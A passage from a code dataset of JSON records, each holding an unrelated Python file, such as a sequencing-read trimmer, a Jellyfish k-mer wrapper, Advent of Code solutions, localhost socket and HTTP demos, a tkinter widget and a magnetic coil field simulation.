'\\t'.join(r1) + '\\n\\t' + '\\t'.join(r2) + '\\n')\n                    else:\n                        h1 = r1[0].split(' ')[0] + '_' + umi + ' ' + r1[0].split(' ')[1]\n                        h2 = r2[0].split(' ')[0] + '_' + umi + ' ' + r2[0].split(' ')[1]\n                        fout1.write(h1 + r1[1] + r1[2] + r1[3])\n                        fout2.write(h2 + r2[1] + r2[2] + r2[3])\n                    #h1 = r1[0].split(' ')[0] + '_' + umi + ' ' + r1[0].split(' ')[1]\n                    #h2 = r2[0].split(' ')[0] + '_' + umi + ' ' + r2[0].split(' ')[1]\n                    #fout1.write(h1 + r1[1] + r1[2] + r1[3])\n                    #fout2.write(h2 + r2[1] + r2[2] + r2[3])\n                    #quanum = list(map(ord, qua))\n                    #quanum = [i - 33 for i in quanum]\n                    #quanumstr = '\\t'.join(list(map(str, quanum)))\n                    #fout_umi.write(''.join([r1[0].split(' ')[0], '_', umi, '\\t', umi, '\\t', quanumstr, '\\n']))\n                    #fout_umi.write(h2 + umi + '\\n' +  '+\\n' + qua + '\\n')\n    fout1.close()\n    fout2.close()\n    # fout_umi.close()\n    stats_out = open(stats_file, 'w')\n    stats_out.write('Total number of reads == ' + str(num_total_reads) + '\\n')\n    stats_out.write('Number of short reads (either read_length <{0}bp) == {1}\\n'.format(\n        min_read_len, num_short_reads))\n    stats_out.write('Number of unproper read pairs (containing incorrect headers) == ' + str(num_error_reads1) + '\\n')\n    stats_out.write('Number of read pairs without correct common sequences/MTs == ' + str(num_error_reads2) + '\\n')\n    stats_out.write('The time of trimming is %s minutes.' % str((time.time() - time_start) / 60))\n    stats_out.close()\n\n\ndef trim_read_pairs_by_trimmomatic(trimmomatic_dir,\n                                   read1, read2, \n                                   trimmed1, un_trimmed1,\n                                   trimmed2, un_trimmed2,\n                                   min_read_len,\n                                   stats_file, logger_trim_process,\n                                   logger_trim_errors):\n    if not os.path.isfile(read1):\n        store_trim_logs(logger_trim_process,'null', read1 + ' does not exist!' + '\\n')\n        store_trim_logs(logger_trim_process,'null', 'Error: cannot find NGS read file!' + '\\n')\n        exit()\n    if not os.path.isfile(trimmomatic_dir):\n        store_trim_logs(logger_trim_process,'null', trimmomatic_dir + ' does not exist!' + '\\n')\n        store_trim_logs(logger_trim_process,'null', 'Error: cannot find trimmomatic.jar!' + '\\n')\n        exit()\n    command = 'java -jar {0} PE -threads 1 -phred33 -summary {1} {2} {3} {4} {5} {6} {7} ' \\\n              'ILLUMINACLIP:{8}:2:30:10 LEADING:5 TRAILING:5 SLIDINGWINDOW:4:20 MINLEN:{9} '.format(\n        trimmomatic_dir, stats_file, read1, read2, trimmed1, un_trimmed1, trimmed2, un_trimmed2,\n        os.path.dirname(trimmomatic_dir) + '/adapters/TruSeq3-PE.fa', min_read_len)\n    stdout, stderr = stdout_err(command)\n    store_trim_logs(logger_trim_process, 'null', stdout)\n    store_trim_logs('null', logger_trim_errors, stderr)\n","sub_path":"pipelines/trim/trim_reads_v1.py","file_name":"trim_reads_v1.py","file_ext":"py","file_size_in_byte":8029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"196773624","text":"def max_even_seq(n):\n    tempEven = 0  # will be used to save the length new sequence while iterating\n    longstEven = 0  # the length longest even sequence untill now\n    for i in str(n):  # iterating (n) as a string\n        if int(i) % 2 == 0:  # checks if the cuurent number is even\n            tempEven += 1  # counts the lengh of the current seque\n        elif tempEven != 0:  # if the number is odd, and tempEven is not = 0, then tempEven = 0.\n            tempEven = 0\n        if tempEven > longstEven:  # if a longer sequence is found, it's length is saved\n            longstEven = tempEven\n    return longstEven\n\n\n","sub_path":"max_even_seq/subs/2017B/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"24955808","text":"import unittest\nfrom troposphere import GetAtt, Template, Join\nfrom troposphere.awslambda import Code, Function\n\n\nclass TestAWSLambda(unittest.TestCase):\n    def test_exclusive(self):\n        lambda_func = Function(\n            \"AMIIDLookup\",\n            Handler=\"index.handler\",\n            Role=GetAtt(\"LambdaExecutionRole\", \"Arn\"),\n            Code=Code(\n                S3Bucket=\"lambda-functions\",\n                S3Key=\"amilookup.zip\",\n            ),\n            Runtime=\"nodejs\",\n            Timeout=\"25\",\n        )\n        t = Template()\n        t.add_resource(lambda_func)\n        t.to_json()\n\n    def test_zip_file(self):\n        lambda_func = Function(\n            \"AMIIDLookup\",\n            Handler=\"index.handler\",\n            Role=GetAtt(\"LambdaExecutionRole\", \"Arn\"),\n            Code=Code(\n                ZipFile=Join(\"\", [\n                    \"var response = require('cfn-response');\",\n                    \"exports.handler = function(event, context) {\",\n                    \"  var input = parseInt(event.ResourceProperties.Input);\",\n                    \"  var responseData = {Value: input * 5};\",\n                    \"  response.send(\"\n                    \"    event, context, response.SUCCESS, responseData\"\n                    \"  );\",\n                    \"};\"\n                ]),\n            ),\n            Runtime=\"nodejs\",\n            Timeout=\"25\",\n        )\n        t = Template()\n        t.add_resource(lambda_func)\n        t.to_json()\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"tests/test_awslambda.py","file_name":"test_awslambda.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"589498222","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pickle as pkl\nfrom .smit import SimIter\n\nrs = []\ntime = np.array(0)\npos = np.array(0.3)\nvel = np.array(0)\nsm = SimIter()\nfor r in sm:\n    rs.append(r)\n    print('Altitude: {:.3f} Velocity: {:.3f} Time: {:.1f}'.format(r.position, r.velocity, sm.envstate.time))\n    time = np.append(time, sm.envstate.time)\n    pos = np.append(pos, r.position)\n    vel = np.append(vel, r.velocity)\nplt.figure(1)\nplt.plot(time, pos, '.')\nplt.plot(time, vel, '.')\nplt.xlabel('Time (s)')\nplt.ylabel('Altitude (m)')\nplt.title('1 DOF Rocket Simulation')\nplt.show()\ninput()\n\npkl.dump(rs, open(\"firstrun.pkl\", \"wb\"))\n","sub_path":"simulator/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"341010425","text":"'''\nSome auxiliary functions to check on, and run jellyfish\n'''\n\nimport distutils.version\nimport os\nimport shlex\nimport subprocess\nimport sys\nimport pandas\nimport numpy as np\nimport progressbar\n\njellyfish_min_version = \"2.2.4\"\n\nbar = progressbar.ProgressBar()\n\ndef run(cmd):\n    '''\n    Process generator\n    '''\n    print(\"Running: {}\".format(cmd), file = sys.stderr)\n    #p = subprocess.Popen(shlex.split(cmd), stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n    #out, err = p.communicate()\n    p = subprocess.check_call(cmd, shell = True)\n    return 0\n\ndef read_table(sample_id, make_binary = True):\n    '''\n    Quickly read a table of kmer counts\n\n    With make_binary, the output is always 0,1. But that can change later\n    '''\n    tab = pandas.read_csv(\"{}.txt\".format(sample_id), delimiter = '\\t', names = ['kmer', '{}'.format(sample_id)])\n    if make_binary:\n        tab[sample_id] = np.where(tab[sample_id] > 0, 1, 0)\n    return tab\n\ndef join_tables(master, new_table, on):\n    '''\n    Quickly join two tables on column ON\n    '''\n    return pandas.merge(master, new_table, on = on, sort = False)\n\ndef find_var_rows(row):\n    return np.count_nonzero(row) < len(row)\n\nclass JellyFish:\n    def __init__(self, force = False):\n        self.cmd = ''\n        self.version = ''\n        self.force = force\n    def exists(self):\n        try:\n            p = subprocess.Popen(shlex.split('jellyfish --version'), stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n            out,err = p.communicate()\n            cmd,version = out.split()\n            self.cmd = cmd.decode()\n            self.version = version.decode()\n            if distutils.version.LooseVersion(self.version) >= distutils.version.LooseVersion(jellyfish_min_version):\n                print(\"Found jellyfish version {}.... OK!\".format(self.version))\n            else:\n                raise ValueError(\"Version of jellyfish found is less than {}, please update to run dingo\".format(min_version))\n        except ValueError:\n            print(\"Did not find jellyfish on the path.\")\n    def __build_input(self, path, clear = False):\n        if clear:\n            gen = open(\"generator.txt\", 'w')\n        else:\n            gen = open(\"generator.txt\", 'a')\n        path = os.path.abspath(path)\n        if path.endswith('.gz'):\n            gen.write(\"gunzip -c {}\\n\".format(path))\n        else:\n            gen.write(\"cat {}\\n\".format(path))\n        gen.close()\n        return\n    def count_all_mers(self, tab, ksize, hash_size, threads = 16, output_file = 'allcount', min_number = 10, simult_read = 2, n_bytes = 1):\n        cmd = self.cmd + ' count -s {} -m {} -G {} --out-counter-len {} -C -L {} -o {} -g {} -t {}'.format(hash_size, ksize, simult_read, n_bytes, min_number, output_file, 'generator.txt', threads)\n        for s in tab:\n            self.__build_input(s[3])\n        p = run(cmd)\n        cmd = self.cmd + ' dump -o {0}.fa {0}'.format(output_file)\n        p = run(cmd)\n    def count_ind_mers(self, tab, ksize, hash_size, threads = 16, infile = 'allcount.fa', min_number = 10, simult_read = 2, n_bytes = 1):\n        for s in bar(tab):\n            output_file = s[0]\n            if os.path.exists(\"{}.txt\".format(output_file)) and not self.force:\n                print(\"File {}.txt already exists... Skipping kmer counting!\".format(output_file))\n            else:\n                self.__build_input(s[3], clear = True)\n                cmd = self.cmd + ' count -s {} -m {} -G {} --out-counter-len {} -C -o {}.jf --if {} -g {} -t {}'.format(hash_size, ksize, simult_read, n_bytes, output_file, infile, \"generator.txt\", threads)\n                p = run(cmd)\n                cmd = self.cmd + ' dump -ct -o {0}.txt {0}.jf'.format(output_file)\n                p = run(cmd)\n    def join_counts(self, tab, pickle = True):\n        master = read_table(tab[0][0])\n        for s in tab[1:]:\n            master = join_tables(master, read_table(s[0]), on = 'kmer')\n        master = master.loc[master.apply(find_var_rows, axis = 1),] # remove kmers present in all samples\n        master = master.transpose()\n        print(\"Found {} variable kmers.\".format(master.shape[1]), file = sys.stderr)\n        if pickle:\n            master.to_pickle(\".kmer_table.pickle\")\n        master = master.values\n        return [master[1:], master[0]]\n    def load_kmertable(self, pickle_file = \".kmer_table.pickle\"):\n        master = pandas.read_pickle(pickle_file)\n        master = master.values\n        return [master[1:], master[0]]\n","sub_path":"dingo/jellyfish.py","file_name":"jellyfish.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"297751251","text":"import http.client\n\n\ndef main():\n    try:\n        connection = http.client.HTTPConnection('127.0.0.1', '6002')\n        connection.request('GET', '/')\n    except ConnectionRefusedError as e:\n        print(str.format('[#] <{}> exception: {}', type(e), e))\n\n    print(str.format('[*] {}', issubclass(ConnectionRefusedError, OSError)))\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"spl/http_package/client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"291245970","text":"import networkx as nx\n\ndef add_planet(graph, input):\n    inner = input[:input.find(')')]\n    outer = input[input.find(')') + 1:]\n    if (inner not in graph):\n        graph.add_node(inner)\n    if (outer not in graph):\n        graph.add_node(outer)\n    graph.add_edge(inner, outer)\n\ndef get_indirect_orbits(graph, node, ctr):\n    if (len(list(graph.successors(node))) == 0):\n        return (0)\n    else:\n        node_list = list(graph.successors(node))\n        ctr += len(node_list)\n        for elem in node_list:\n            ctr += get_indirect_orbits(graph, elem, 0)\n        return (ctr)\n\nif __name__ == \"__main__\":\n    G = nx.DiGraph()\n\n    for _ in range(2306):\n        input_line = input()\n        add_planet(G, input_line)\n    nodes = G.nodes()\n    edges = G.edges()\n    indirect_orbits = 0\n    for node in nodes:\n        indirect_orbits += get_indirect_orbits(G, node, 0)\n    planet_you = list(G.predecessors('YOU'))\n    planet_san = list(G.predecessors('SAN'))\n    print(indirect_orbits)\n    G = G.to_undirected()\n    print(len(nx.bidirectional_shortest_path(G, planet_you[0], planet_san[0])) - 1)\n","sub_path":"Day06/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"15494886","text":"import pytest\nfrom gamegym.strategy import UniformStrategy, FixedStrategy\nfrom gamegym.distribution import Explicit\nfrom gamegym.utils import get_rng\nfrom gamegym.games.matrix import *\n\n\ndef test_base():\n    gs = [\n        PrisonersDilemma(),\n        GameOfChicken(),\n        RockPaperScissors(),\n        MatchingPennies(),\n        MatrixZeroSumGame([[1, 3], [3, 2], [0, 0]], [\"A\", \"B\", \"C\"], [0, 1]),\n        MatrixGame([[1], [2], [3]], [[\"A1\", \"A2\", \"A3\"]]),\n        MatrixGame(np.zeros([2, 4, 5, 3], dtype=np.int32)),\n    ]\n    for g in gs:\n        s = g.initial_state()\n        assert not s.is_terminal()\n        assert s.player() == 0\n        assert len(s.actions()) == g.m.shape[0]\n        repr(s)\n        repr(g)\n    g = RockPaperScissors()\n    s = g.initial_state().play(\"R\").play(\"P\")\n    assert s.is_terminal()\n    print(s.history, s.values())\n    assert ((-1, 1) == s.values()).all()\n\n\ndef test_strategies():\n\n    g = RockPaperScissors()\n    rng = get_rng(seed=41)\n    s1 = [UniformStrategy(), UniformStrategy()]\n    v1 = np.mean(\n        [g.play_strategies(s1, rng=rng)[-1].values() for i in range(300)], 0)\n    assert sum(v1) == pytest.approx(0.0)\n    assert v1[0] == pytest.approx(0.0, abs=0.1)\n    s2 = [\n        FixedStrategy(Explicit({\"R\": 1.0, \"P\": 0.0, \"S\": 0.0})),\n        FixedStrategy(Explicit({\"R\": 0.5, \"P\": 0.5, \"S\": 0.0}))]\n    v2 = np.mean(\n        [g.play_strategies(s2, rng=rng)[-1].values() for i in range(300)], 0)\n    assert sum(v2) == pytest.approx(0.0)\n    assert v2[0] == pytest.approx(-0.5, abs=0.1)\n","sub_path":"tests/games/test_matrix.py","file_name":"test_matrix.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"625012718","text":"# imports\nfrom threading import Thread\nfrom random import randint\nimport socket\nimport time\n# from memory_profiler import profile\n\n# quantidade de threads cliente / servidor\nnum_threads = 5\n# tempos\n# servidor[i] = [cliente, tempo]\nservidor = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]\ntempos = [servidor, servidor, servidor, servidor, servidor]\n\n\n# linha de execução do servidor\n# @profile\ndef server(id):\n    global tempos\n    # criação da porta\n    port = 5000 + id\n    # contador de mensagens recebidas\n    mensagens_recebidas = 0\n    # criação do socket\n    try:\n        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        server.bind(('localhost', port))\n        server.listen(5)\n        print(\"Servidor {} iniciado - Porta: {}\".format(id, port))\n\n        # inicio da execução\n        try:\n            while(mensagens_recebidas < num_threads):\n                connect, client = server.accept()\n                print(\"Cliente conectado\")\n                msg = connect.recv(128)\n                msg = msg.decode()\n                if(not msg):\n                    continue\n\n                print(\"Servidor {} recebeu: {}\".format(id, msg))\n                mensagens_recebidas += 1\n                connect.close()\n        except Exception as e:\n            print(\"Falha de conexão na porta {}\".format(port))\n        finally:\n            connect.close()\n    except Exception as e:\n        print(\"Não foi possível inicializar o servidor {}\".format(port))\n    finally:\n        connect.close()\n        for i in range(len(tempos[id])):\n            tempos[id][i][1] = time.time() - tempos[id][i][1]\n        print(\"++++ Servidor {} concluído ++++\".format(id))\n\n\n# linha de execução do cliente\n# @profile\ndef client(id):\n    global tempos\n    # mensagem que será enviada\n    msg = str(randint(0, 100))\n    # contador de mensagens enviadas\n    mensagens_enviadas = 0\n    # criação dos sockets\n    sockets = []\n    for i in range(num_threads):\n        tempos[i][id % 5][1] = time.time()\n        sockets.append(socket.socket(socket.AF_INET, socket.SOCK_STREAM))\n        tempos[i][id % 5][0] = sockets[-1].getsockname()[1]\n\n    # inicio da execução\n    print(\"Cliente {} iniciou\".format(id))\n    while(mensagens_enviadas < num_threads):\n        # configura a porta\n        port = 5000 + mensagens_enviadas\n        # tenta enviar a mensagem\n        try:\n            sockets[mensagens_enviadas].connect(('localhost', port))\n            sockets[mensagens_enviadas].send(msg.encode())\n            print(\"Cliente {} enviou {} na porta {}\".format(id, msg, port))\n            mensagens_enviadas += 1\n        except Exception:\n            pass\n\n    print(\"Cliente {} concluído\".format(id))\n\n\n# criação e inicialização da thread servidor\nfor i in range(num_threads):\n    tserver = Thread(target=server, args=(i, ))\n    tserver.start()\n\n\n# criação e inicialização das threads cliente\nfor i in range(num_threads, 10):\n    tclient = Thread(target=client, args=(i, ))\n    tclient.start()\n    tclient.join()\n\n# cálculo da média do tempo\nmedia = 0\nfor servidor in tempos:\n    for cliente in servidor:\n        media += cliente[1]\n\nmedia *= 1000\nmedia /= 25\nprint('Tempo médio de comunicação: {}ms'.format(media))\n","sub_path":"socket/5x5.py","file_name":"5x5.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"546781923","text":"from pdb import set_trace as db\n\nwith open(\"raw-input.txt\") as f:\n    input = [int(n) for n in f.read().split(\"\\n\")]\n\ntest_str = \"\"\"35\n20\n15\n25\n47\n40\n62\n55\n65\n95\n102\n117\n150\n182\n127\n219\n299\n277\n309\n576\"\"\"\ntest_input = [int(n) for n in test_str.split(\"\\n\")]\n\n\ndef check_is_valid(chunk, num):\n    for (i, a) in enumerate(chunk):\n        for b in chunk[i + 1 :]:\n            if num == a + b:\n                return True\n    return False\n\n\ndef find_first_invalid(input, chunk_size):\n    chunk = input[:chunk_size]\n    i = chunk_size\n    while i < len(input):\n        curr = input[i]\n        if not check_is_valid(chunk, curr):\n            return curr\n        chunk.pop(0)\n        chunk.append(curr)\n        i += 1\n\n\nprint(find_first_invalid(test_input, 5))  # 127\nprint(find_first_invalid(input, 25))  # 167829540\n\n### BRUTE FORCE\n# def find_weakness(input, tgt_num):\n#     for (i, a) in enumerate(input):\n#         for (j, b) in enumerate(input[i + 1 :]):\n#             weak_arr = input[i : i + j + 1]\n#             arr_sum = sum(weak_arr)\n#             if arr_sum > tgt_num:\n#                 break\n#             elif arr_sum == tgt_num:\n#                 print(weak_arr)\n#                 return min(weak_arr) + max(weak_arr)\n\n### ROLLING SUM\ndef find_weakness(input, tgt_num):\n    start_i = 0\n    end_i = 1\n    arr_sum = sum(input[start_i : end_i])\n    while end_i < len(input):\n        if arr_sum == tgt_num:\n            break\n        elif arr_sum < tgt_num:\n            arr_sum += input[end_i]\n            end_i += 1\n        elif arr_sum > tgt_num:\n            arr_sum -= input[start_i]\n            start_i += 1\n\n    sub_arr = input[start_i : end_i]\n    return min(sub_arr) + max(sub_arr)\n\n\nprint(find_weakness(test_input, 127))  # 62\nprint(find_weakness(input, 167829540))  # 28045630\n","sub_path":"2020/day09/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"541324721","text":"from tkinter import Tk, Label, Button, Entry, Menu, font\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import *\nfrom protk import boolbox, button, colorcreator, colorscheme, combobox, compiler, entry, frame, framegrid, label, listbox, menu, treeview, window, expander\nimport time\nclass entry:\n\tdef __init__(self, widget_dict):\n\t\tself.__dict__.update(widget_dict)\t\t\n\t\twidget_dict[\"border\"]=\"0\"\n\t\tself.frame=frame.frame(widget_dict).frame\n\n\t\tif self.title != None:\n\t\t\twidget_dict[\"row\"]=1\n\t\t\twidget_dict[\"column\"]=1\n\t\t\twidget_dict[\"location\"]=self.frame\n\t\t\twidget_dict[\"expand_row\"]=\"0\"\n\t\t\twidget_dict[\"expand_column\"]=\"0\"\n\t\t\tself.row=1\n\t\t\tself.column=1\n\t\t\tself.expand_row=\"0\"\n\t\t\tself.expand_column=\"0\"\n\t\t\tself.title_label=label.label(widget_dict)\n\n\n\t\tself.entry=Entry(self.frame, bg=colorscheme.en_bg_color, fg=colorscheme.en_fg_color, disabledbackground=colorscheme.disabled_background, disabledforeground=colorscheme.disabled_foreground)\n\t\n\n\t\tif self.entry_position==\"n\":\n\t\t\tself.row=0\n\t\telif self.entry_position==\"s\":\n\t\t\tself.row=2\n\t\telif self.entry_position==\"e\":\n\t\t\tself.column=0\n\t\telif self.entry_position==\"w\":\n\t\t\tself.column=2\n\t\telif self.entry_position==None:\n\t\t\tself.column=0\n\t\n\t\tself.entry.grid(row=self.row, column=self.column, sticky=\"s\", pady=2, padx=2)\n\t\tif eval(self.read_only)==True:\n\t\t\tself.entry.config(state=\"disabled\")\n\t\texpander.check_expansion(self)\n\t\tself.typewrite_entry()\n\n\tdef typewrite_entry(self):\n\t\tif self.typewrite != True:\n\t\t\tself.entry.configure(width=self.width)\n\t\telse:\n\t\t\tfor a in range(0, self.width):\n\t\t\t\ttime.sleep(.01)\n\t\t\t\tself.entry.configure(width=a)\n\t\t\t\tself.root.update()\n\n\tdef insert_data(self, x):\n\t\tself.entry.delete(\"0\", END)\n\t\tself.entry.insert(\"0\", x)\n\t\tdef configure_entry_height(self, x):\n\t\t\tif len(x)<25:\n\t\t\t\tself.entry.configure(height=1)\n\t\t\telif len(x)>25 and len(x)<80:\n\t\t\t\tself.entry.configure(height=2)\n\t\t\telif len(x)>80 and len(x)<120:\n\t\t\t\tself.entry.configure(height=3)\n\t\t\telse:\n\t\t\t\tself.entry.configure(height=4)\n\t\tself.configure_entry_height(x)\n\n\tdef clear(self):\n\t\tself.entry.delete(\"0\", END)\n\tdef return_data(self):\n\t\treturn self.entry.get()\n\tdef get(self):\n\t\treturn self.entry.get()\n\n\n\nif __name__==\"__main__\":\n\tpass","sub_path":"entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"430825889","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os.path\nimport argparse\nimport sys\nfrom scipy.spatial.transform import Rotation\n\nimport loopfield\n\n# two-coil setup\n#  width=2e-3\n\n\nfield = loopfield.Field()\n\n\ndef save_3d_file(output_file, data, header):\n    fh = open(output_file, 'w')\n    fh.write(header + \"\\n\")\n    shape = data.shape\n    for i in range(shape[0]):\n        block = data[i]\n        np.savetxt(fh, block, fmt=\"%.17g\", delimiter=\"\\t\")\n        fh.write(\"\\n\")\n    fh.close()\n\n    \ndef add_coil(pos, N, normal=[0,0,1], width=5.3e-3, r_o=30.25e-3 - 1e-3, r_i=5e-3, current=1):\n    # pos is coil midpoint\n    A = width * (r_o - r_i)\n    A_loop = A/N\n    d_loop = np.sqrt(A_loop)\n    N_d = int(round(width/d_loop))\n    N_r = int(round((r_o-r_i)/d_loop))\n    N_prod = N_d * N_r\n    print(\"building coil with %d x %d = %d loops, error = %d ( %.2g percent)\" % (N_d, N_r, N_prod, N_prod - N, 100 * np.abs((N_prod - N) / N)))\n    radiuses = np.linspace(r_i, r_o, N_r)\n    mid_points = pos + np.outer(np.linspace(-width/2, width/2, N_d), normal)\n    for radius in (radiuses):\n        for mid_point in (mid_points):\n            field.addLoop(loopfield.Loop(mid_point, normal, radius, current))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '--force', action=\"store_true\", help=\"overwrite existing files\")\nparser.add_argument('-o', '--output', help=\"basename for output data files\")\nparser.add_argument('--tilt_x', help=\"tilt (in degrees) around x axis\", type=float, default=0)\nparser.add_argument('--shift_z', help=\"shift sample in z direction (m)\", type=float, default=0) \n\n\nargs = parser.parse_args()\n\nif args.output:\n    args.output += \"_tilt_x=%.2g\" % args.tilt_x\n    args.output += \"_shift_z=%.2g\" % args.shift_z\n    \nw = 25e-3 + 2e-3\ncoil_pos = np.array([0, 0, w])\nadd_coil(coil_pos, 9530)\nadd_coil(-coil_pos, 10623)\n\n# calculate field on axis\nN = 100\npos_vals = np.zeros((N,3))\nz_vals = np.linspace(-2e-3, 2e-3, N)\npos_vals[:,2] = z_vals\nfield_vals = field.evaluate(pos_vals)\ndata_axis = np.stack((z_vals, field_vals[:,2]), axis=1)\n\n\n\n# calculate field on sample plain\nN = 50\nd_sample = 6e-3\nsample_normal = np.array([0,0,1])\nx_vals = np.linspace(-d_sample/2, d_sample/2, N)\ny_vals = np.linspace(-d_sample/2, d_sample/2, N)\nx_mesh, y_mesh = np.meshgrid(x_vals, y_vals, indexing=\"ij\")\nsample_positions = np.zeros((N, N, 3))\nsample_positions[...,0] = x_mesh\nsample_positions[...,1] = y_mesh\n\n# tilt sample\n\nr = Rotation.from_euler('x', args.tilt_x, degrees=True)\nrotation_matrix = r.as_dcm()\n\ntilted_positions = np.dot(sample_positions, rotation_matrix.T)\n\n# shift sample\n\ntilted_positions = tilted_positions - np.array([0, 0, args.shift_z])\n\n# calculate field\n\nsample_fields = field.evaluate(np.reshape(tilted_positions, (N * N, 3)))\nsample_fields = np.reshape(sample_fields, (N, N, 3))\n\nsample_normal = np.dot(rotation_matrix, sample_normal)\nprint(\"tilted sample_normal = \", sample_normal)\n\nsample_normal_field = np.dot(sample_fields, sample_normal)\nsample_normal_field = np.reshape(sample_normal_field, (N, N, 1))\nprint(sample_normal_field.shape)\n\nsample_data = np.concatenate((sample_positions, tilted_positions, sample_fields, sample_normal_field), axis=2)\n\ndef ensure_unique(file):\n    if not args.force and os.path.isfile(file):\n        sys.exit(\"file %s already exists. Use -f option to overwrite\" % file)\n        \nif args.output:\n    axis_output_file = args.output + \"_axis.dat\"\n    ensure_unique(axis_output_file)\n    header = \"# z\\tB_z\"\n    np.savetxt(axis_output_file, data_axis, header=header, comments='', fmt=\"%.17g\")\n\n    sample_output_file = args.output + \"_sample_plain.dat\"\n    ensure_unique(sample_output_file)\n    \n    header = \"# x\\ty\\tz\\tx_t\\ty_t\\tz_t\\tB_x\\tB_y\\tB_z\\tB_normal\"\n    save_3d_file(sample_output_file, sample_data, header)\n\n\n\n\n","sub_path":"two-coil/field.py","file_name":"field.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"183349010","text":"import time\nimport Cliente\n\n#Barranquilla, Cartagena, Bucaramanga, Cusco, San Andres Islas, Santa Marta, Valledup\n\nciudadesDestino = {\"Barranquilla\": [0,0], \"Cartagena\": [0,0], \"Bucaramanga\": [0,0], \"Cusco\": [0,0], \"San Andres Islas\": [0,0], \"Santa Marta\":[0,0], \"Valledupar\": [0,0]}\n\n\n#ciudadesDestino = {\"Barranquilla\": [0,0]}\n#las fechas que se quiere revisar\n\nlistaFechas = [10,11,12,13,14]\n\ndef repetirTresVeces(pFecha):\n\n    \n    for a in ciudadesDestino.keys():\n\n        fecha = 0\n        nombreCiudad = \"\"\n\n        nombreCiudad = a + \"Ciudad\"\n\n        while ciudadesDestino[a][0] < 3:\n            nombreCiudad = Cliente.Ciudad(a)\n            if nombreCiudad.solicitarVuelo(\"2019-11-\" + str(pFecha)):\n                print(\"Listo\", ciudadesDestino[a][0])\n\n            fecha += 1\n\n            ciudadesDestino[a][0] = fecha \n            time.sleep(60)\n     \n\n            #El primer elemento de la lista corresponde a los tres intentos con la misma fecha\n\ndef modificarFecha():\n\n    \n    for a in listaFechas:\n\n        repetirTresVeces(a)\n        for a in ciudadesDestino.keys():\n            ciudadesDestino[a][1] += 1\n            ciudadesDestino[a][0] = 0\n\n        time.sleep(180)\n        print(ciudadesDestino)\n\n\n\nmodificarFecha()\n","sub_path":"BuscadorIterativo.py","file_name":"BuscadorIterativo.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"328463836","text":"import numpy as np\nimport pandas as pd\n\n\ndef prepare_series(observations, transformations=None):\n    \"\"\"\n    Extracts the relevant parameters from a Series of observations to feed the\n    maxlike object.\n\n    Parameters\n    ----------\n    observations : pd.Series\n        sequence of observations, the index correspond to the features and the\n        values to the target values.\n    transformations : dict\n        (named) list of transformations to apply to observations labels,\n        grouped by index\n\n    Returns\n    -------\n    res : dict\n        resulting ndarrays after applying the transformations on the observations\n    axis : list[list]\n        feature index names\n    \"\"\"\n    if transformations is None:\n        transformations = {\"N\": np.size}\n\n    if isinstance(observations.index, pd.MultiIndex):\n        axis = tuple((level.sort_values()\n                      for level in observations.index.levels))\n        shape = tuple((len(a) for a in axis))\n        df = observations.groupby(observations.index).\\\n            agg(transformations.values()).\\\n            rename(columns={transf.__name__: name\n                            for name, transf in transformations.items()}).\\\n            reindex(pd.MultiIndex.from_product(axis)).fillna(0)\n    else:\n        axis = observations.index.sort_values()\n        shape = (axis.size)\n        df = observations.groupby(axis).agg(transformations.values()).\\\n            rename(columns={transf.__name__: name\n                            for name, transf in transformations.items()}).\\\n            reindex(axis).fillna(0)\n    res = {k: df[k].values.reshape(shape) for k in transformations.keys()}\n    return res, axis\n\n\ndef prepare_dataframe(df, weight_col, result_col, transformations):\n    axis = tuple((level.sort_values() for level in df.index.levels))\n    shape = tuple((len(a) for a in axis))\n    new_index = pd.MultiIndex.from_product(axis)\n    w = df[weight_col].to_frame('N').groupby(df.index).sum().\\\n        reindex(new_index).fillna(0)\n    df = (df[result_col] * df[weight_col]).groupby(df.index).\\\n        agg(transformations.values()).\\\n        rename(columns={transf.__name__: name\n                        for name, transf in transformations.items()}).\\\n        reindex(new_index).fillna(0)\n    res = {k: df[k].values.reshape(shape) for k in 